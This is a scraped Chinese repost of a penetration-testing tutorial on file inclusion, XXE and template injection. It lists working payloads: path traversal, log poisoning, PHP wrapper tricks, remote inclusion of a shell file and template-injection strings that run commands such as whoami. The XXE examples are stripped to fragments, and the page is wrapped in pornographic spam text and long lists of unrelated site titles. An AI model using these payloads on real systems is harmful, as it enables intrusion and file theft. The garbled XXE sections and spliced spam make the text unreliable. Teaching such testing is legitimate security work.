少妇被粗黑进进出出在线观看_日日摸夜夜爽无码_免费久久_日韩免费视频_热播短剧玫瑰冠冕免费观看_japanese精品少妇

網站滲透測試 對文件包含注入檢測辦法
  • 更新時間:2025-05-13 02:25:25
  • 開發經驗
  • 發布時間:3年前
  • 689

昨天給大家普及到了滲透測試中執行命令漏洞的檢測方法,今天抽出時間由我們Sine安全的滲透工程師來講下遇到文件包含漏洞以及模板注入漏洞的檢測方法和防御手段,本文僅參考給有授權滲透測試的正規安全檢測的客戶,讓更多的客戶了解到具體測試的內容,是如何進行全面的網站安全測試。


3.8. 文件包含

3.8.1. 基礎

常見的文件包含漏洞的形式為

考慮常用的幾種包含方式為

同目錄包含 file=.htaccess

目錄遍歷 ?file=../../../../../../../../../var/lib/locate.db

日志注入 ?file=../../../../../../../../../var/log/apache/error.log

利用 /proc/self/environ

其中日志可以使用SSH日志或者Web日志等多種日志來源測試

3.8.2. 繞過技巧

常見的應用在文件包含之前,可能會調用函數對其進行判斷,一般有如下幾種繞過方式

3.8.2.1. url編碼繞過

如果WAF中是字符串匹配,可以使用url多次編碼的方式可以繞過

3.8.2.2. 特殊字符繞過

某些情況下,讀文件支持使用Shell通配符,如 ? * 等

url中 使用 ? # 可能會影響include包含的結果

某些情況下,unicode編碼不同但是字形相近的字符有同一個效果

3.8.2.3. %00截斷

幾乎是最常用的方法,條件是magic_quotes_gpc打開,而且php版本小于5.3.4。

3.8.2.4. 長度截斷

Windows上的文件名長度和文件路徑有關。具體關系為:從根目錄計算,文件路徑長度最長為259個bytes。

msdn定義“`#define MAX_PATH 260“`,第260個字符為字符串結尾的“`0“`

linux可以用getconf來判斷文件名長度限制和文件路徑長度限制

獲取最長文件路徑長度:getconf PATH_MAX /root 得到4096 獲取最長文件名:getconf NAME_MAX /root 得到255

那么在長度有限的時候,`././././` (n個) 的形式就可以通過這個把路徑爆掉

在php代碼包含中,這種繞過方式要求php版本 < php 5.2.8

3.8.2.5. 偽協議繞過

遠程包含: 要求 allow_url_fopen=On and allow_url_include=On , payload為 ?file=[http|https|ftp]://域名/shell.txt

PHP INPUT: 把payload放在POST參數中作為包含的文件,要求 allow_url_include=On ,payload為 ?file=php://input

: 使用偽協議讀取文件,payload為 ?file=php://filter/convert.-encode/resource=index.php

DATA: 使用data偽協議讀取文件,payload為 ?file=data://text/plain;,SSBsb3ZlIFBIUAo= 要求 allow_url_include=On

3.9. XXE

3.9.1. XML基礎

XML 指可擴展標記語言(eXtensible Markup Language),是一種用于標記電子文件使其具有結構性的標記語言,被設計用來傳輸和存儲數據。XML文檔結構包括XML聲明、DTD文檔類型定義(可選)、文檔元素。目前,XML文件作為配置文件(Spring、Struts2等)、文檔結構說明文件(PDF、RSS等)、圖片格式文件(SVG header)應用比較廣泛。

3.9.2. XXE

當允許引用外部實體時,可通過構造惡意的XML內容,導致讀取任意文件、執行系統命令、探測內網端口、攻擊內網網站等后果。一般的XXE攻擊,只有在服務器有回顯或者報錯的基礎上才能使用XXE漏洞來讀取服務器端文件,但是也可以通過Blind XXE的方式實現攻擊。

3.9.3. 攻擊方式

3.9.3.1. 拒絕服務攻擊

]>

&a2;

若解析過程非常緩慢,則表示測試成功,目標站點可能有拒絕服務漏洞。具體攻擊可使用更多層的迭代或遞歸,也可引用巨大的外部實體,以實現攻擊的效果。

3.9.3.2. 文件讀取

]>

&file;

3.9.3.3. SSRF

]>

4

3.9.3.4. RCE

]>

&xxe;

3.9.3.5. XInclude

3.10 模板注入漏洞

3.10. 模版注入

3.10.1. 簡介

模板引擎用于使用動態數據呈現內容。此上下文數據通常由用戶控制并由模板進行格式化,以生成網頁、電子郵件等。模板引擎通過使用代碼構造(如條件語句、循環等)處理上下文數據,允許在模板中使用強大的語言表達式,以呈現動態內容。如果攻擊者能夠控制要呈現的模板,則他們將能夠注入可暴露上下文數據,甚至在服務器上運行任意命令的表達式。

3.10.2. 測試方法

確定使用的引擎

查看引擎相關的文檔,確定其安全機制以及自帶的函數和變量

需找攻擊面,嘗試攻擊

3.10.3. 測試用例

簡單的數學表達式,{{ 7+7 }} => 14

字符串表達式 {{ "ajin" }} => ajin

Ruby

Java

${7*7}

Twig

{{7*7}}

Smarty

{php}echo `id`;{/php}

AngularJS

$eval('1+1')

Tornado

引用模塊 {% import module %}

=> {% import os %}{{ os.popen("whoami").read() }}

Flask/Jinja2

{{ config.items() }}

{{''.__class__.__mro__[-1].__subclasses__()}}

Django

{{ request }}

{% debug %}

{% load module %}

{% include "x.html" %}

{% extends "x.html" %}

3.10.4. 目標

創建對象

文件讀寫

遠程文件包含

信息泄漏 提權

3.10.5. 相關屬性

3.10.5.1. __class__

python中的新式類(即顯示繼承object對象的類)都有一個屬性 __class__ 用于獲取當前實例對應的類,例如 "".__class__ 就可以獲取到字符串實例對應的類

3.10.5.2. __mro__

python中類對象的 __mro__ 屬性會返回一個tuple對象,其中包含了當前類對象所有繼承的基類,tuple中元素的順序是MRO(Method Resolution Order) 尋找的順序。

3.10.5.3. __globals__

保存了函數所有的所有全局變量,在利用中,可以使用 __init__ 獲取對象的函數,并通過 __globals__ 獲取 file os 等模塊以進行下一步的利用

3.10.5.4. __subclasses__()

python的新式類都保留了它所有的子類的引用,__subclasses__() 這個方法返回了類的所有存活的子類的引用(是類對象引用,不是實例)。

因為python中的類都是繼承object的,所以只要調用object類對象的 __subclasses__() 方法就可以獲取想要的類的對象。這一節滲透測試講到的這些內容和繞過手法,如果對自己網站不太放心的話可以找專業的網站安全公司來處理解決,國內做的比較好的如Sinesafe,綠盟,啟明星辰等等。

我們專注高端建站,小程序開發、軟件系統定制開發、BUG修復、物聯網開發、各類API接口對接開發等。十余年開發經驗,每一個項目承諾做到滿意為止,多一次對比,一定讓您多一份收獲!

本文章出于推來客官網,轉載請表明原文地址:https://www.tlkjt.com/experience/7582.html
推薦文章

在線客服

掃碼聯系客服

3985758

回到頂部

主站蜘蛛池模板: 欧美性色黄大片a级毛片视频_精品成在人线AV无码免费看_中日韩欧美国产一区二区三区_国产美女遭强高潮网站观看_无码日韩精品一区二区人妻_日韩国产成人 | 麻豆传谋在线观看免费mv_天天久久av_国产爱v_国产激情网址_久久日本三级韩国三级_笼中女囚在线观看 | 再深点灬舒服灬太大了添少妇字幕_免费看一区二区三区四区_成人免费播放视频777777_北条麻妃一区二区三区在线_国产精品久久久久久久竹霞_在线国产一区 | 欧美性a视频_久久黄色a级片_无码人妻aⅴ一区二区三区麻豆_亚洲综合中文字幕在线_免费国产wwwwwww网站_欧美男人操女人视频 | 国产精品伦一区二区三级视频永妇_水野朝阳停不了的高潮69_91久操视频_一区二区乱子伦在线播放_久久综合色av_日韩欧美精选 一区二区三区高清_亚洲人成网站免费播放_中文字幕亚洲欧美在线_九热在线视频_麻豆影视网站_97精品视频 | 超碰在线看_91综合在线_youbbb国产在线视频_亭亭五月天色网_丁香五月亚洲综合在线_奇米影视7777777 | 亚洲精品国产综合区久久久久久久_亚洲精品一区二区在线观看_在线爱爱_午夜免费影院_午夜传媒_岛国激情 | 国产清纯在线一区二区VR_久久综合一区_亚洲草草草_性一交一伦一a级_99精品免费久久久久久久久_国产精品一区二区三区观看 | 国产精品日产无码av永久不卡_暖暖视频免费高清日本_国产一级特黄AAAA级婬片_日韩成人AV在线一区二区三区_岛国免费网站_日本免费福利视频 | 欧美在线精品一区_桃乃木香奈中文字幕在线观看_在线观看视频www_久草福利资源站_久久久看_成人国产精品2021 | 精品国产乱码久久久久久丨区2区_18禁男女污污污午夜网站免费_91亚洲精品久久_91精品国产综合久久久密臀九色_鸳鸯谱在线观看高清_国产亚洲精品久久久久久快乐8 | 久久中文字幕在线观看_日韩亚洲欧美在线观看_青青草在线观看视频_国内自拍99热_色窝窝亚洲av网_狠狠色综合TV久久久久久 | 国产乱人伦偷精品视频下_人妻丰满熟妇av无码区_天天操操夜夜操操_91精品国产一_欧美日韩免费在线视频_五月综合色婷婷在线观看 | 中文字幕日韩第一页_黄色网在线免费看_欧美日韩在线播放视频_性欧洲精品videos_思思久久6_精品久久久久久狼人社区 | 欧美日韩香蕉_人人天天色_国产精品视频公开费视颁_久久艹国产视频_fc2国产成人免费视频_好吊妞视频788gao在线观看 | 亚洲欧美综合在线天堂_欧美狂野另类xxxxoooo_无码GOGO大胆啪啪艺术_国产精品日韩三级_久久国产在线观看_亚洲午夜国产精品无码 | 踪合国产第二页_国产SUV精品一区二区88L_猫咪社区免费资源在线观看_一级毛片视频免费观看_国产精品麻_久久理论视频 | 国产最新地址_亚洲AV无码一区二区三区网站_久久久av大桥未久一区二区_久久国产精品99国产_挺进长腿秘书的臀缝耸动小说_亚洲精品中文字幕视频 | 天天操夜夜操国产精品_国产特级毛片AAAAAA高清_久久久久久久久久一本门道91_欧美片第一页_免费99精品国产人妻自在线_亚洲国产日韩一区三区 | 中国一级免费视频_久久国产成人免费网站777_www.一区_四虎国产成人精品免费一女五男_99在线精品免费视频_久久久久久精品人妻免费网站 | 深夜视频免费观看_97SE亚洲综合自在线_亚洲AV片无码久久五月_国产精品视频久久看_一级s片_久久99精品久久久久久青青91 | 四虎成人WWW成人影院_中文字幕无码大香线蕉_网友自拍视频在线观看_欧美在线观看二区_无码中文精品视视在线观看_一区二区三区四区国产免费 | 超级无码视频在线观看_国产一区二区三区av网站_草溜影院_国产乱人av一区二区三区_亚洲粉嫩高潮的18P_亚洲av人无码激艳猛片 | 内射人妻骚骚骚_中文字幕第86亚洲另类_日韩字幕_日本丰满少妇与黑人_本网站久久精品_亚洲AV女人18毛片水真多 | 成人黄色a级片_91精品国产足浴勾搭女居士_亚洲免费影视_一级在线免费看_精品国产麻豆免费人成网站_国模私拍福利视频 | 女人体a级1963免费_麻豆映画在线观看_91久久久www播放日本观看_久久www人成免费产片_久久在线视频_91亚洲精华国产精华精华乳 | 亚洲视频1区2区_少妇又黄又爽又紧又刺激_我脱了老师的内裤摸她的爆乳_嘿咻视频免费网站_99久久久国产精品免费调教网站_最新国产精品综合在线啪 | 艹逼逼网_特级xxxxx欧美孕妇_三年片免费观看_亚洲和欧洲一码二码区别7777_伊人久久大香线蕉AV波多野结衣_中国黄色片视频 | 国产在线观看一区二区_国产精品黄片_日本爱爱_男人操女人在线观看_亚洲AV日韩AV永久无码PPT_日韩天天操 | 中文字幕日韩第一页_黄色网在线免费看_欧美日韩在线播放视频_性欧洲精品videos_思思久久6_精品久久久久久狼人社区 | 亚洲国产精品伦理_插入综合网_国产亚洲精品综合一区91_精品激情欧美日韩_欧美一区国产_亚洲色自偷自拍另类小说 | 国产欧美中文_美丽人妻在夫前被黑人_久久成人成狠狠爱综合网_免费视频看片网站_黄色极品网站_国产视一区 | 成人免费A级毛片久久_99爱免费_久久国产精品99久久人人澡_中文字幕日韩精品欧美一区蜜桃网_熟女毛多熟妇人妻在线视频_又紧又大又爽精品一区二区 | 久久国产片_久草a视频_亚洲草草网_欧美伦交_国产精品九九久久99视频_无码成人片一区二区三区 | 成–人–黄–色–网–站_AV在线观看网站无码不卡的_国产最新网址_久操中文在线_91插插插插插_精品乱码视频在线 | 亚洲国产精品第一区二区_人妖一区_a级黄色在线观看_视频在线_一级黄色香蕉视频_欧美亚洲一区二区在线观看 | 品色堂永远免费论坛_国产一区二区免费_www一区二区_中国少妇内射xxxhd_97人人射_亚洲浮力影院久久久久久 | av无码一级毛片免费_91国内免费视频_欧美福利视频一区二区_日本大人吃奶视频xxxx_欧美成人一区在线观看_九九超碰 | 亚洲av毛片一区二二区三三区_91传媒91久久久_一本一道久久a久久综合精品图_无码国模大尺度视频在线观看_亚洲精品无码中文久久字幕_久草在线国产视频 | 在线亚洲一区观看_99热精品久久_亚洲国产成人91porn_欧美AAAAAA级午夜福利视频_国产精品视频免费一区二区三区_米奇777四色精品人人爽 | 五月天男人天堂_国产在线无码制服丝袜无码_日韩精彩视频_日本乱大交xxxx公交车_国产区精品区_va亚洲va欧美va国产综合 |